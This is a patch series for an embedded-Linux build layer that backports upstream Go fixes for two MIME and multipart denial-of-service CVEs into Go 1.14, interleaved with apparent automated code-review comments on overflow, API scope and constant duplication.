+@@ -297,6 +302,10 @@ type Reader struct {
+ dashBoundary []byte // "--boundary"
+ }
+
++// maxMIMEHeaderSize is the maximum size of a MIME header we will parse,
++// including header keys, values, and map overhead.
++const maxMIMEHeaderSize = 10 << 20
++
+ // NextPart returns the next part in the multipart or an error.
+ // When there are no more parts, the error io.EOF is returned.
+ //
+@@ -304,7 +313,7 @@ type Reader struct {
+ // has a value of "quoted-printable", that header is instead
+ // hidden and the body is transparently decoded during Read calls.
+ func (r *Reader) NextPart() (*Part, error) {
+- return r.nextPart(false)
++ return r.nextPart(false, maxMIMEHeaderSize)
+ }
+
+ // NextRawPart returns the next part in the multipart or an error.
+@@ -313,10 +322,10 @@ func (r *Reader) NextPart() (*Part, error) {
+ // Unlike NextPart, it does not have special handling for
+ // "Content-Transfer-Encoding: quoted-printable".
+ func (r *Reader) NextRawPart() (*Part, error) {
+- return r.nextPart(true)
++ return r.nextPart(true, maxMIMEHeaderSize)
+ }
+
+-func (r *Reader) nextPart(rawPart bool) (*Part, error) {
++func (r *Reader) nextPart(rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
+ if r.currentPart != nil {
+ r.currentPart.Close()
+ }
+@@ -341,7 +350,7 @@ func (r *Reader) nextPart(rawPart bool) (*Part, error) {
+
+ if r.isBoundaryDelimiterLine(line) {
+ r.partsRead++
+- bp, err := newPart(r, rawPart)
++ bp, err := newPart(r, rawPart, maxMIMEHeaderSize)
+ if err != nil {
+ return nil, err
+ }
+diff --git a/src/mime/multipart/readmimeheader.go b/src/mime/multipart/readmimeheader.go
+new file mode 100644
+index 0000000..6836928
+--- /dev/null
++++ b/src/mime/multipart/readmimeheader.go
+@@ -0,0 +1,14 @@
++// Copyright 2023 The Go Authors. All rights reserved.
++// Use of this source code is governed by a BSD-style
++// license that can be found in the LICENSE file.
++package multipart
++
++import (
++ "net/textproto"
++ _ "unsafe" // for go:linkname
++)
++
++// readMIMEHeader is defined in package net/textproto.
++//
++//go:linkname readMIMEHeader net/textproto.readMIMEHeader
++func readMIMEHeader(r *textproto.Reader, lim int64) (textproto.MIMEHeader, error)
+diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
+index 94133ee..170d3f5 100644
+--- a/src/net/http/request_test.go
++++ b/src/net/http/request_test.go
+@@ -962,7 +962,7 @@ func testMissingFile(t *testing.T, req *Request) {
+ t.Errorf("FormFile file = %v, want nil", f)
+ }
+ if fh != nil {
+- t.Errorf("FormFile file header = %q, want nil", fh)
++ t.Errorf("FormFile file header = %v, want nil", fh)
+ }
+ if err != ErrMissingFile {
+ t.Errorf("FormFile err = %q, want ErrMissingFile", err)
+diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
+index f63f5ec..96553fb 100644
+--- a/src/net/textproto/reader.go
++++ b/src/net/textproto/reader.go
+@@ -7,9 +7,11 @@ package textproto
+ import (
+ "bufio"
+ "bytes"
++ "errors"
+ "fmt"
+ "io"
+ "io/ioutil"
++ "math"
+ "strconv"
+ "strings"
+ "sync"
+@@ -482,6 +484,12 @@ func (r *Reader) ReadDotLines() ([]string, error) {
+ // }
+ //
+ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
++ return readMIMEHeader(r, math.MaxInt64)
++}
++
++// readMIMEHeader is a version of ReadMIMEHeader which takes a limit on the header size.
++// It is called by the mime/multipart package.
++func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
+ // Avoid lots of small slice allocations later by allocating one
+ // large one ahead of time which we'll cut up into smaller
+ // slices. If this isn't big enough later, we allocate small ones.
+@@ -525,6 +533,15 @@ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
+ continue
+ }
+
++ // backport 5c55ac9bf1e5f779220294c843526536605f42ab
++ //
++ // value is computed as
++ // value := string(bytes.TrimLeft(v, " \t"))
++ //
++ // in the original patch from 1.19. This relies on
++ // 'v' which does not exist in 1.14. We leave the
++ // 1.14 method unchanged.
++
+ // Skip initial spaces in value.
+ i++ // skip colon
+ for i < len(kv) && (kv[i] == ' ' || kv[i] == '\t') {
+@@ -533,6 +550,16 @@ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
+ value := string(kv[i:])
+
+ vv := m[key]
++ if vv == nil {
++ lim -= int64(len(key))
++ lim -= 100 // map entry overhead
++ }
++ lim -= int64(len(value))
++ if lim < 0 {
++ // TODO: This should be a distinguishable error (ErrMessageTooLarge)
++ // to allow mime/multipart to detect it.
++ return m, errors.New("message too large")
++ }
+ if vv == nil && len(strs) > 0 {
+ // More than likely this will be a single-element key.
+ // Most headers aren't multi-valued.
+--
+2.25.1
+
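Review bot: In readForm (src/mime/multipart/formdata.go), `maxFileMemoryBytes := maxMemory` is later used as `io.CopyN(&b, p, maxFileMemoryBytes+1)`, and for ReadForm(math.MaxInt64) that addition wraps to a negative limit. With a negative limit io.CopyN should copy nothing and report no error, so `n > maxFileMemoryBytes` is false and the file part is stored with empty content instead of being read or rejected. The overflow guard in this hunk covers only maxMemoryBytes. Clamping right after the assignment avoids the wrap: `if maxFileMemoryBytes == math.MaxInt64 { maxFileMemoryBytes-- }`. As far as I recall, later upstream Go releases carry an equivalent clamp, so it may be worth checking whether that follow-up belongs in this backport series.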
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24534.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24534.patch
new file mode 100644
index 0000000000..d50db04bed
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24534.patch
@@ -0,0 +1,200 @@
+From d6759e7a059f4208f07aa781402841d7ddaaef96 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Fri, 10 Mar 2023 14:21:05 -0800
+Subject: [PATCH] [release-branch.go1.19] net/textproto: avoid overpredicting
+ the number of MIME header keys
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802452
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+(cherry picked from commit f739f080a72fd5b06d35c8e244165159645e2ed6)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802393
+Reviewed-by: Damien Neil <dneil@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Change-Id: I675451438d619a9130360c56daf529559004903f
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481982
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/d6759e7a059f4208f07aa781402841d7ddaaef96]
+CVE: CVE-2023-24534
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/bytes/bytes.go | 13 +++++++
+ src/net/textproto/reader.go | 31 +++++++++++------
+ src/net/textproto/reader_test.go | 59 ++++++++++++++++++++++++++++++++
+ 3 files changed, 92 insertions(+), 11 deletions(-)
+
+diff --git a/src/bytes/bytes.go b/src/bytes/bytes.go
+index e872cc2..1f0d760 100644
+--- a/src/bytes/bytes.go
++++ b/src/bytes/bytes.go
+@@ -1078,6 +1078,19 @@ func Index(s, sep []byte) int {
+ return -1
+ }
+
++// Cut slices s around the first instance of sep,
++// returning the text before and after sep.
++// The found result reports whether sep appears in s.
++// If sep does not appear in s, cut returns s, nil, false.
++//
++// Cut returns slices of the original slice s, not copies.
++func Cut(s, sep []byte) (before, after []byte, found bool) {
++ if i := Index(s, sep); i >= 0 {
++ return s[:i], s[i+len(sep):], true
++ }
++ return s, nil, false
++}
++
+ func indexRabinKarp(s, sep []byte) int {
+ // Rabin-Karp search
+ hashsep, pow := hashStr(sep)
+diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
+index a505da9..8d547fe 100644
+--- a/src/net/textproto/reader.go
++++ b/src/net/textproto/reader.go
+@@ -486,8 +487,11 @@ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
+ // large one ahead of time which we'll cut up into smaller
+ // slices. If this isn't big enough later, we allocate small ones.
+ var strs []string
+- hint := r.upcomingHeaderNewlines()
++ hint := r.upcomingHeaderKeys()
+ if hint > 0 {
++ if hint > 1000 {
++ hint = 1000 // set a cap to avoid overallocation
++ }
+ strs = make([]string, hint)
+ }
+
+@@ -562,9 +566,11 @@ func mustHaveFieldNameColon(line []byte) error {
+ return nil
+ }
+
+-// upcomingHeaderNewlines returns an approximation of the number of newlines
++var nl = []byte("\n")
++
++// upcomingHeaderKeys returns an approximation of the number of keys
+ // that will be in this header. If it gets confused, it returns 0.
+-func (r *Reader) upcomingHeaderNewlines() (n int) {
++func (r *Reader) upcomingHeaderKeys() (n int) {
+ // Try to determine the 'hint' size.
+ r.R.Peek(1) // force a buffer load if empty
+ s := r.R.Buffered()
+@@ -572,17 +578,20 @@ func (r *Reader) upcomingHeaderNewlines() (n int) {
+ return
+ }
+ peek, _ := r.R.Peek(s)
+- for len(peek) > 0 {
+- i := bytes.IndexByte(peek, '\n')
+- if i < 3 {
+- // Not present (-1) or found within the next few bytes,
+- // implying we're at the end ("\r\n\r\n" or "\n\n")
+- return
++ for len(peek) > 0 && n < 1000 {
++ var line []byte
++ line, peek, _ = bytes.Cut(peek, nl)
++ if len(line) == 0 || (len(line) == 1 && line[0] == '\r') {
++ // Blank line separating headers from the body.
++ break
++ }
++ if line[0] == ' ' || line[0] == '\t' {
++ // Folded continuation of the previous line.
++ continue
+ }
+ n++
+- peek = peek[i+1:]
+ }
+- return
++ return n
+ }
+
+ // CanonicalMIMEHeaderKey returns the canonical format of the
+diff --git a/src/net/textproto/reader_test.go b/src/net/textproto/reader_test.go
+index 3124d43..3ae0de1 100644
+--- a/src/net/textproto/reader_test.go
++++ b/src/net/textproto/reader_test.go
+@@ -9,6 +9,7 @@ import (
+ "bytes"
+ "io"
+ "reflect"
++ "runtime"
+ "strings"
+ "testing"
+ )
+@@ -127,6 +128,42 @@ func TestReadMIMEHeaderSingle(t *testing.T) {
+ }
+ }
+
++// TestReaderUpcomingHeaderKeys is testing an internal function, but it's very
++// difficult to test well via the external API.
++func TestReaderUpcomingHeaderKeys(t *testing.T) {
++ for _, test := range []struct {
++ input string
++ want int
++ }{{
++ input: "",
++ want: 0,
++ }, {
++ input: "A: v",
++ want: 1,
++ }, {
++ input: "A: v\r\nB: v\r\n",
++ want: 2,
++ }, {
++ input: "A: v\nB: v\n",
++ want: 2,
++ }, {
++ input: "A: v\r\n continued\r\n still continued\r\nB: v\r\n\r\n",
++ want: 2,
++ }, {
++ input: "A: v\r\n\r\nB: v\r\nC: v\r\n",
++ want: 1,
++ }, {
++ input: "A: v" + strings.Repeat("\n", 1000),
++ want: 1,
++ }} {
++ r := reader(test.input)
++ got := r.upcomingHeaderKeys()
++ if test.want != got {
++ t.Fatalf("upcomingHeaderKeys(%q): %v; want %v", test.input, got, test.want)
++ }
++ }
++}
++
+ func TestReadMIMEHeaderNoKey(t *testing.T) {
+ r := reader(": bar\ntest-1: 1\n\n")
+ m, err := r.ReadMIMEHeader()
+@@ -223,6 +260,28 @@ func TestReadMIMEHeaderTrimContinued(t *testing.T) {
+ }
+ }
+
++// Test that reading a header doesn't overallocate. Issue 58975.
++func TestReadMIMEHeaderAllocations(t *testing.T) {
++ var totalAlloc uint64
++ const count = 200
++ for i := 0; i < count; i++ {
++ r := reader("A: b\r\n\r\n" + strings.Repeat("\n", 4096))
++ var m1, m2 runtime.MemStats
++ runtime.ReadMemStats(&m1)
++ _, err := r.ReadMIMEHeader()
++ if err != nil {
++ t.Fatalf("ReadMIMEHeader: %v", err)
++ }
++ runtime.ReadMemStats(&m2)
++ totalAlloc += m2.TotalAlloc - m1.TotalAlloc
++ }
++ // 32k is large and we actually allocate substantially less,
++ // but prior to the fix for #58975 we allocated ~400k in this case.
++ if got, want := totalAlloc/count, uint64(32768); got > want {
++ t.Fatalf("ReadMIMEHeader allocated %v bytes, want < %v", got, want)
++ }
++}
++
+ type readResponseTest struct {
+ in string
+ inCode int
+--
+2.25.1
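Review bot: The src/bytes/bytes.go part of this backport adds an exported `bytes.Cut` to the 1.14 standard library, which widens the toolchain's public API only to serve one caller in net/textproto. Code built with this patched toolchain could start using `bytes.Cut` and then fail to compile against an unpatched Go 1.14, and the added doc comment already calls the function lower-case `cut`. I would keep the helper private to net/textproto, declared as `func cut(s, sep []byte) (before, after []byte, found bool)` next to `var nl` and implemented with bytes.Index, and call it as `line, peek, _ = cut(peek, nl)` in upcomingHeaderKeys. The helper body stays the same; only its package and name change.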
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_1.patch
new file mode 100644
index 0000000000..39e1304fbd
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_1.patch
@@ -0,0 +1,134 @@
+From ef41a4e2face45e580c5836eaebd51629fc23f15 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Thu, 16 Mar 2023 14:18:04 -0700
+Subject: [PATCH] [release-branch.go1.19] mime/multipart: avoid excessive copy
+ buffer allocations in ReadForm
+
+When copying form data to disk with io.Copy,
+allocate only one copy buffer and reuse it rather than
+creating two buffers per file (one from io.multiReader.WriteTo,
+and a second one from os.File.ReadFrom).
+
+Thanks to Jakob Ackermann (@das7pad) for reporting this issue.
+
+For CVE-2023-24536
+For #59153
+For #59269
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802453
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802395
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Change-Id: Ie405470c92abffed3356913b37d813e982c96c8b
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481983
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/ef41a4e2face45e580c5836eaebd51629fc23f15]
+CVE: CVE-2023-24536
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata.go | 15 +++++++--
+ src/mime/multipart/formdata_test.go | 49 +++++++++++++++++++++++++++++
+ 2 files changed, 61 insertions(+), 3 deletions(-)
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index a7d4ca97f0484..975dcb6b26db4 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -84,6 +84,7 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ maxMemoryBytes = math.MaxInt64
+ }
+ }
++ var copyBuf []byte
+ for {
+ p, err := r.nextPart(false, maxMemoryBytes)
+ if err == io.EOF {
+@@ -147,14 +148,22 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ }
+ }
+ numDiskFiles++
+- size, err := io.Copy(file, io.MultiReader(&b, p))
++ if _, err := file.Write(b.Bytes()); err != nil {
++ return nil, err
++ }
++ if copyBuf == nil {
++ copyBuf = make([]byte, 32*1024) // same buffer size as io.Copy uses
++ }
++ // os.File.ReadFrom will allocate its own copy buffer if we let io.Copy use it.
++ type writerOnly struct{ io.Writer }
++ remainingSize, err := io.CopyBuffer(writerOnly{file}, p, copyBuf)
+ if err != nil {
+ return nil, err
+ }
+ fh.tmpfile = file.Name()
+- fh.Size = size
++ fh.Size = int64(b.Len()) + remainingSize
+ fh.tmpoff = fileOff
+- fileOff += size
++ fileOff += fh.Size
+ if !combineFiles {
+ if err := file.Close(); err != nil {
+ return nil, err
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index 5cded7170c6b8..f5b56083b2377 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -368,3 +368,52 @@ func testReadFormManyFiles(t *testing.T, distinct bool) {
+ t.Fatalf("temp dir contains %v files; want 0", len(names))
+ }
+ }
++
++func BenchmarkReadForm(b *testing.B) {
++ for _, test := range []struct {
++ name string
++ form func(fw *Writer, count int)
++ }{{
++ name: "fields",
++ form: func(fw *Writer, count int) {
++ for i := 0; i < count; i++ {
++ w, _ := fw.CreateFormField(fmt.Sprintf("field%v", i))
++ fmt.Fprintf(w, "value %v", i)
++ }
++ },
++ }, {
++ name: "files",
++ form: func(fw *Writer, count int) {
++ for i := 0; i < count; i++ {
++ w, _ := fw.CreateFormFile(fmt.Sprintf("field%v", i), fmt.Sprintf("file%v", i))
++ fmt.Fprintf(w, "value %v", i)
++ }
++ },
++ }} {
++ b.Run(test.name, func(b *testing.B) {
++ for _, maxMemory := range []int64{
++ 0,
++ 1 << 20,
++ } {
++ var buf bytes.Buffer
++ fw := NewWriter(&buf)
++ test.form(fw, 10)
++ if err := fw.Close(); err != nil {
++ b.Fatal(err)
++ }
++ b.Run(fmt.Sprintf("maxMemory=%v", maxMemory), func(b *testing.B) {
++ b.ReportAllocs()
++ for i := 0; i < b.N; i++ {
++ fr := NewReader(bytes.NewReader(buf.Bytes()), fw.Boundary())
++ form, err := fr.ReadForm(maxMemory)
++ if err != nil {
++ b.Fatal(err)
++ }
++ form.RemoveAll()
++ }
++
++ })
++ }
++ })
++ }
++}
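Review bot: The comment above `writerOnly` in the formdata.go hunk names `os.File.ReadFrom` but does not say that the wrapper exists to hide that method so `io.CopyBuffer` actually uses `copyBuf`. As far as I know `os.File` only gained `ReadFrom` in Go 1.15, so on the go-1.14 tree this recipe patches the wrapper is probably a no-op kept for parity with upstream. A comment such as `// Hide any ReaderFrom on file so io.CopyBuffer uses copyBuf; harmless where os.File has no ReadFrom.` would make that explicit. readForm starts and ends outside the hunks shown.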
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_2.patch
new file mode 100644
index 0000000000..9ba5114c82
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_2.patch
@@ -0,0 +1,184 @@
+From 7a359a651c7ebdb29e0a1c03102fce793e9f58f0 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Thu, 16 Mar 2023 16:56:12 -0700
+Subject: [PATCH] [release-branch.go1.19] net/textproto, mime/multipart:
+ improve accounting of non-file data
+
+For requests containing large numbers of small parts,
+memory consumption of a parsed form could be about 250%
+over the estimated size.
+
+When considering the size of parsed forms, account for the size of
+FileHeader structs and increase the estimate of memory consumed by
+map entries.
+
+Thanks to Jakob Ackermann (@das7pad) for reporting this issue.
+
+For CVE-2023-24536
+For #59153
+For #59269
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802454
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802396
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Change-Id: I31bc50e9346b4eee6fbe51a18c3c57230cc066db
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481984
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/7a359a651c7ebdb29e0a1c03102fce793e9f58f0]
+CVE: CVE-2023-24536
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata.go | 9 +++--
+ src/mime/multipart/formdata_test.go | 55 ++++++++++++-----------------
+ src/net/textproto/reader.go | 8 ++++-
+ 3 files changed, 37 insertions(+), 35 deletions(-)
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index 975dcb6b26db4..3f6ff697ca608 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -103,8 +103,9 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ // Multiple values for the same key (one map entry, longer slice) are cheaper
+ // than the same number of values for different keys (many map entries), but
+ // using a consistent per-value cost for overhead is simpler.
++ const mapEntryOverhead = 200
+ maxMemoryBytes -= int64(len(name))
+- maxMemoryBytes -= 100 // map overhead
++ maxMemoryBytes -= mapEntryOverhead
+ if maxMemoryBytes < 0 {
+ // We can't actually take this path, since nextPart would already have
+ // rejected the MIME headers for being too large. Check anyway.
+@@ -128,7 +129,10 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ }
+
+ // file, store in memory or on disk
++ const fileHeaderSize = 100
+ maxMemoryBytes -= mimeHeaderSize(p.Header)
++ maxMemoryBytes -= mapEntryOverhead
++ maxMemoryBytes -= fileHeaderSize
+ if maxMemoryBytes < 0 {
+ return nil, ErrMessageTooLarge
+ }
+@@ -183,9 +187,10 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ }
+
+ func mimeHeaderSize(h textproto.MIMEHeader) (size int64) {
++ size = 400
+ for k, vs := range h {
+ size += int64(len(k))
+- size += 100 // map entry overhead
++ size += 200 // map entry overhead
+ for _, v := range vs {
+ size += int64(len(v))
+ }
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index f5b56083b2377..8ed26e0c34081 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -192,10 +192,10 @@ func (r *failOnReadAfterErrorReader) Read(p []byte) (n int, err error) {
+ // TestReadForm_NonFileMaxMemory asserts that the ReadForm maxMemory limit is applied
+ // while processing non-file form data as well as file form data.
+ func TestReadForm_NonFileMaxMemory(t *testing.T) {
+- n := 10<<20 + 25
+ if testing.Short() {
+- n = 10<<10 + 25
++ t.Skip("skipping in -short mode")
+ }
++ n := 10 << 20
+ largeTextValue := strings.Repeat("1", n)
+ message := `--MyBoundary
+ Content-Disposition: form-data; name="largetext"
+@@ -203,38 +203,29 @@ Content-Disposition: form-data; name="largetext"
+ ` + largeTextValue + `
+ --MyBoundary--
+ `
+-
+ testBody := strings.ReplaceAll(message, "\n", "\r\n")
+- testCases := []struct {
+- name string
+- maxMemory int64
+- err error
+- }{
+- {"smaller", 50 + int64(len("largetext")) + 100, nil},
+- {"exact-fit", 25 + int64(len("largetext")) + 100, nil},
+- {"too-large", 0, ErrMessageTooLarge},
+- }
+- for _, tc := range testCases {
+- t.Run(tc.name, func(t *testing.T) {
+- if tc.maxMemory == 0 && testing.Short() {
+- t.Skip("skipping in -short mode")
+- }
+- b := strings.NewReader(testBody)
+- r := NewReader(b, boundary)
+- f, err := r.ReadForm(tc.maxMemory)
+- if err == nil {
+- defer f.RemoveAll()
+- }
+- if tc.err != err {
+- t.Fatalf("ReadForm error - got: %v; expected: %v", err, tc.err)
+- }
+- if err == nil {
+- if g := f.Value["largetext"][0]; g != largeTextValue {
+- t.Errorf("largetext mismatch: got size: %v, expected size: %v", len(g), len(largeTextValue))
+- }
+- }
+- })
++ // Try parsing the form with increasing maxMemory values.
++ // Changes in how we account for non-file form data may cause the exact point
++ // where we change from rejecting the form as too large to accepting it to vary,
++ // but we should see both successes and failures.
++ const failWhenMaxMemoryLessThan = 128
++ for maxMemory := int64(0); maxMemory < failWhenMaxMemoryLessThan*2; maxMemory += 16 {
++ b := strings.NewReader(testBody)
++ r := NewReader(b, boundary)
++ f, err := r.ReadForm(maxMemory)
++ if err != nil {
++ continue
++ }
++ if g := f.Value["largetext"][0]; g != largeTextValue {
++ t.Errorf("largetext mismatch: got size: %v, expected size: %v", len(g), len(largeTextValue))
++ }
++ f.RemoveAll()
++ if maxMemory < failWhenMaxMemoryLessThan {
++ t.Errorf("ReadForm(%v): no error, expect to hit memory limit when maxMemory < %v", maxMemory, failWhenMaxMemoryLessThan)
++ }
++ return
+ }
++ t.Errorf("ReadForm(x) failed for x < 1024, expect success")
+ }
+
+ // TestReadForm_MetadataTooLarge verifies that we account for the size of field names,
+diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
+index 9a21777df8be0..c1284fde25eb7 100644
+--- a/src/net/textproto/reader.go
++++ b/src/net/textproto/reader.go
+@@ -503,6 +503,12 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
+
+ m := make(MIMEHeader, hint)
+
++ // Account for 400 bytes of overhead for the MIMEHeader, plus 200 bytes per entry.
++ // Benchmarking map creation as of go1.20, a one-entry MIMEHeader is 416 bytes and large
++ // MIMEHeaders average about 200 bytes per entry.
++ lim -= 400
++ const mapEntryOverhead = 200
++
+ // The first line cannot start with a leading space.
+ if buf, err := r.R.Peek(1); err == nil && (buf[0] == ' ' || buf[0] == '\t') {
+ line, err := r.readLineSlice()
+@@ -538,7 +544,7 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
+ vv := m[key]
+ if vv == nil {
+ lim -= int64(len(key))
+- lim -= 100 // map entry overhead
++ lim -= mapEntryOverhead
+ }
+ lim -= int64(len(value))
+ if lim < 0 {
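Review bot: `mimeHeaderSize` hard-codes `size = 400` and `size += 200`, while `readForm` and `textproto.readMIMEHeader` each declare their own `mapEntryOverhead = 200`, so the same memory estimate now lives in three places that can drift apart. These numbers decide when a form is rejected with `ErrMessageTooLarge`, so I would name them once per package or at least annotate the literals, e.g. `size = 400 // fixed MIMEHeader overhead; keep in sync with net/textproto.readMIMEHeader`. Separately, the closing `t.Errorf("ReadForm(x) failed for x < 1024, expect success")` in TestReadForm_NonFileMaxMemory does not match the loop bound `failWhenMaxMemoryLessThan*2`, which is 256. readForm and readMIMEHeader are only partly visible in these hunks.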
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_3.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_3.patch
new file mode 100644
index 0000000000..58c0a484ee
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_3.patch
@@ -0,0 +1,349 @@
+From 7917b5f31204528ea72e0629f0b7d52b35b27538 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Mon, 20 Mar 2023 10:43:19 -0700
+Subject: [PATCH] [release-branch.go1.19] mime/multipart: limit parsed mime message sizes
+
+The parsed forms of MIME headers and multipart forms can consume
+substantially more memory than the size of the input data.
+A malicious input containing a very large number of headers or
+form parts can cause excessively large memory allocations.
+
+Set limits on the size of MIME data:
+
+Reader.NextPart and Reader.NextRawPart limit the the number
+of headers in a part to 10000.
+
+Reader.ReadForm limits the total number of headers in all
+FileHeaders to 10000.
+
+Both of these limits may be set with with
+GODEBUG=multipartmaxheaders=<values>.
+
+Reader.ReadForm limits the number of parts in a form to 1000.
+This limit may be set with GODEBUG=multipartmaxparts=<value>.
+
+Thanks for Jakob Ackermann (@das7pad) for reporting this issue.
+
+For CVE-2023-24536
+For #59153
+For #59269
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802455
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1801087
+Reviewed-by: Damien Neil <dneil@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Change-Id: If134890d75f0d95c681d67234daf191ba08e6424
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481985
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/7917b5f31204528ea72e0629f0b7d52b35b27538]
+CVE: CVE-2023-24536
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata.go | 19 ++++++++-
+ src/mime/multipart/formdata_test.go | 61 ++++++++++++++++++++++++++++
+ src/mime/multipart/multipart.go | 31 ++++++++++----
+ src/mime/multipart/readmimeheader.go | 2 +-
+ src/net/textproto/reader.go | 19 +++++----
+ 5 files changed, 115 insertions(+), 17 deletions(-)
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index 216cccb..0b508ae 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -13,6 +13,7 @@ import (
+ "math"
+ "net/textproto"
+ "os"
++ "strconv"
+ )
+
+ // ErrMessageTooLarge is returned by ReadForm if the message form
+@@ -42,6 +43,15 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ numDiskFiles := 0
+ multipartFiles := godebug.Get("multipartfiles")
+ combineFiles := multipartFiles != "distinct"
++ maxParts := 1000
++ multipartMaxParts := godebug.Get("multipartmaxparts")
++ if multipartMaxParts != "" {
++ if v, err := strconv.Atoi(multipartMaxParts); err == nil && v >= 0 {
++ maxParts = v
++ }
++ }
++ maxHeaders := maxMIMEHeaders()
++
+ defer func() {
+ if file != nil {
+ if cerr := file.Close(); err == nil {
+@@ -87,13 +97,17 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
